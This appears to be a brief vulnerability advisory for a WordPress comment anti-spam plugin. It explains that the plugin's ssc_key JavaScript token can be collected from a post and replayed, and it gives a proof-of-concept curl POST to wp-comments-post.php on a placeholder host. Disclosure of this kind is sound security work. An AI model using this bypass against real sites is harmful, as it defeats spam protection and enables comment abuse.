The plugin does not properly generate the Javascript access token for preventing abuse of comment section, allowing threat authors to easily collect the value and add it to the request.
Collect the name and value of ssc_key for the target post and use it on the request.
curl 'http://target.tld/wp-comments-post.php' -X POST --data-raw 'ssc_key_NAME=VALUE&comment=test&author=test&email=test%40test.tld&url=&submit=Post+Comment&comment_post_ID=1&comment_parent=0'